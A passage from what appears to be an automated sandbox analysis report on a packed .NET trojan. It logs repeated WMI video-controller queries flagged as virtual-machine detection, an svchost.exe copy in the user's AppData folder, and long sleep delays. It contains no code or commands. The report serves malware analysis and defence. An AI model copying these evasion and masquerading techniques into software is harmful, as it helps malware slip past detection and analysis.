              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeMemory allocated: 29B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeMemory allocated: 49B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\svchost.exeMemory allocated: 1980000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\svchost.exeMemory allocated: 34A0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\svchost.exeMemory allocated: 54A0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\svchost.exeMemory allocated: 32A0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\svchost.exeMemory allocated: 32A0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\svchost.exeMemory allocated: 52A0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\svchost.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\svchost.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWindow / User API: threadDelayed 584Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWindow / User API: threadDelayed 9200Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6045Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3646Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7798Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1862Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6269Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3539Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2233
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe TID: 7328Thread sleep time: -24903104499507879s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1132Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4344Thread sleep count: 7798 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6800Thread sleep count: 1862 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2896Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2924Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2716Thread sleep count: 7477 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2716Thread sleep count: 2233 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4040Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Users\user\AppData\Local\svchost.exe TID: 7780Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\svchost.exe TID: 7840Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
